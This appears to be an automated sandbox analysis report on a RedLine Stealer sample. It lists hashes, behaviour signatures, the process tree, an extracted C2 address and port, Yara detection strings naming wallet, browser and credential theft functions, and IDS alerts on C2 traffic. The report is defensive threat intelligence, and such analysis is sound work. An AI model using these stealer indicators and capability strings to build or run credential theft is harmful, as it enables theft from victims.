Edit tour

Windows Analysis Report
qJ64p5G1XJ.exe

Overview

General Information

Sample name:	qJ64p5G1XJ.exe renamed because original name is a hash value
Original sample name:	D666C758BE2A66A4C8E0D3C089EA75B1.exe
Analysis ID:	1596766
MD5:	d666c758be2a66a4c8e0d3c089ea75b1
SHA1:	9ef031c211fb82b0810a45256ca9ad32f1577ad5
SHA256:	9fd0ede72e03f6a4897daaa809a4dafa9b9e0eeac52c5244b11df40e9a4af2f2
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

qJ64p5G1XJ.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\qJ64p5G1XJ.exe" MD5: D666C758BE2A66A4C8E0D3C089EA75B1)

qJ64p5G1XJ.exe (PID: 4996 cmdline: "C:\Users\user\Desktop\qJ64p5G1XJ.exe" MD5: D666C758BE2A66A4C8E0D3C089EA75B1)

qJ64p5G1XJ.exe (PID: 4960 cmdline: "C:\Users\user\Desktop\qJ64p5G1XJ.exe" MD5: D666C758BE2A66A4C8E0D3C089EA75B1)

qJ64p5G1XJ.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\qJ64p5G1XJ.exe" MD5: D666C758BE2A66A4C8E0D3C089EA75B1)

conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.227:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1735815535.00000000037D4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x136f2:$a4: get_ScannedWallets 0x12550:$a5: get_ScanTelegram 0x13376:$a6: get_ScanGeckoBrowsersPaths 0x11192:$a7: <Processes>k__BackingField 0xf0a4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10ac6:$a9: <ScanFTP>k__BackingField
00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1735815535.000000000426B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13742:$a4: get_ScannedWallets 0x2b362:$a4: get_ScannedWallets 0x125a0:$a5: get_ScanTelegram 0x2a1c0:$a5: get_ScanTelegram 0x133c6:$a6: get_ScanGeckoBrowsersPaths 0x2afe6:$a6: get_ScanGeckoBrowsersPaths 0x111e2:$a7: <Processes>k__BackingField 0x28e02:$a7: <Processes>k__BackingField 0xf0f4:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d14:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b16:$a9: <ScanFTP>k__BackingField 0x28736:$a9: <ScanFTP>k__BackingField
Process Memory Space: qJ64p5G1XJ.exe PID: 6900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qJ64p5G1XJ.exe PID: 6900	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: qJ64p5G1XJ.exe PID: 6900	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: qJ64p5G1XJ.exe PID: 6900	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x28066:$a4: get_ScannedWallets 0x3738c:$a4: get_ScannedWallets 0x26f0d:$a5: get_ScanTelegram 0x36233:$a5: get_ScanTelegram 0x27cef:$a6: get_ScanGeckoBrowsersPaths 0x37015:$a6: get_ScanGeckoBrowsersPaths 0x25ba0:$a7: <Processes>k__BackingField 0x34ec6:$a7: <Processes>k__BackingField 0x230d3:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x323f9:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x254d4:$a9: <ScanFTP>k__BackingField 0x347fa:$a9: <ScanFTP>k__BackingField
Process Memory Space: qJ64p5G1XJ.exe PID: 2196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qJ64p5G1XJ.exe PID: 2196	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: qJ64p5G1XJ.exe PID: 2196	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x6c37b:$a4: get_ScannedWallets 0x6b222:$a5: get_ScanTelegram 0x6c004:$a6: get_ScanGeckoBrowsersPaths 0x69eb5:$a7: <Processes>k__BackingField 0x673e8:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x697e9:$a9: <ScanFTP>k__BackingField
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.qJ64p5G1XJ.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.qJ64p5G1XJ.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.qJ64p5G1XJ.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
4.2.qJ64p5G1XJ.exe.400000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
4.2.qJ64p5G1XJ.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.qJ64p5G1XJ.exe.37d4128.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.37d4128.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.37d4128.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.qJ64p5G1XJ.exe.37d4128.2.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.qJ64p5G1XJ.exe.37d4128.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.qJ64p5G1XJ.exe.426b178.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.426b178.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.426b178.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.qJ64p5G1XJ.exe.426b178.1.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0xfbcb:$gen01: ChromeGetRoamingName 0xfbff:$gen02: ChromeGetLocalName 0xfc28:$gen03: get_UserDomainName 0x11e67:$gen04: get_encrypted_key 0x113e3:$gen05: browserPaths 0x1172b:$gen06: GetBrowsers 0x11061:$gen07: get_InstalledInputLanguages 0xe84f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x6938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x7318:$spe6: windows-1251, CommandLine: 0x125bd:$spe9: wallet 0xd00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xd107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xd464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xd571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xd6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xd098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xd0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xd25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xd59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xd639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
0.2.qJ64p5G1XJ.exe.426b178.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x119cb:$gen01: ChromeGetRoamingName 0x295eb:$gen01: ChromeGetRoamingName 0x119ff:$gen02: ChromeGetLocalName 0x2961f:$gen02: ChromeGetLocalName 0x11a28:$gen03: get_UserDomainName 0x29648:$gen03: get_UserDomainName 0x13c67:$gen04: get_encrypted_key 0x2b887:$gen04: get_encrypted_key 0x131e3:$gen05: browserPaths 0x2ae03:$gen05: browserPaths 0x1352b:$gen06: GetBrowsers 0x2b14b:$gen06: GetBrowsers 0x12e61:$gen07: get_InstalledInputLanguages 0x2aa81:$gen07: get_InstalledInputLanguages 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x2826f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x20358:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9118:$spe6: windows-1251, CommandLine: 0x20d38:$spe6: windows-1251, CommandLine: 0x143bd:$spe9: wallet
0.2.qJ64p5G1XJ.exe.426b178.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
Click to see the 20 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:06.748945+0100	2045000	1	Malware Command and Control Activity Detected	45.137.22.227	55615	192.168.2.4	49734	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:11.336369+0100	2046056	1	A Network Trojan was detected	45.137.22.227	55615	192.168.2.4	49734	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:11.336369+0100	2045001	1	Malware Command and Control Activity Detected	45.137.22.227	55615	192.168.2.4	49734	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:01.738282+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.137.22.227	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:06.972751+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.137.22.227	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:13.384894+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49740	45.137.22.227	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:11.744860+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.137.22.227	55615	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-22T14:12:01.738282+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.4	49734	45.137.22.227	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: qJ64p5G1XJ.exe

Avira: detected

Found malware configuration

Source: 0.2.qJ64p5G1XJ.exe.37d4128.2.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.227:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: qJ64p5G1XJ.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: qJ64p5G1XJ.exe

Joe Sandbox ML: detected

Source: qJ64p5G1XJ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.4:49737 version: TLS 1.0

Source: qJ64p5G1XJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: xVmy.pdbSHA256! source: qJ64p5G1XJ.exe
Source:	Binary string: xVmy.pdb source: qJ64p5G1XJ.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49734 -> 45.137.22.227:55615
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49734 -> 45.137.22.227:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49738 -> 45.137.22.227:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49740 -> 45.137.22.227:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.227:55615 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49734 -> 45.137.22.227:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.227:55615 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.227:55615 -> 192.168.2.4:49734

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.227:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738
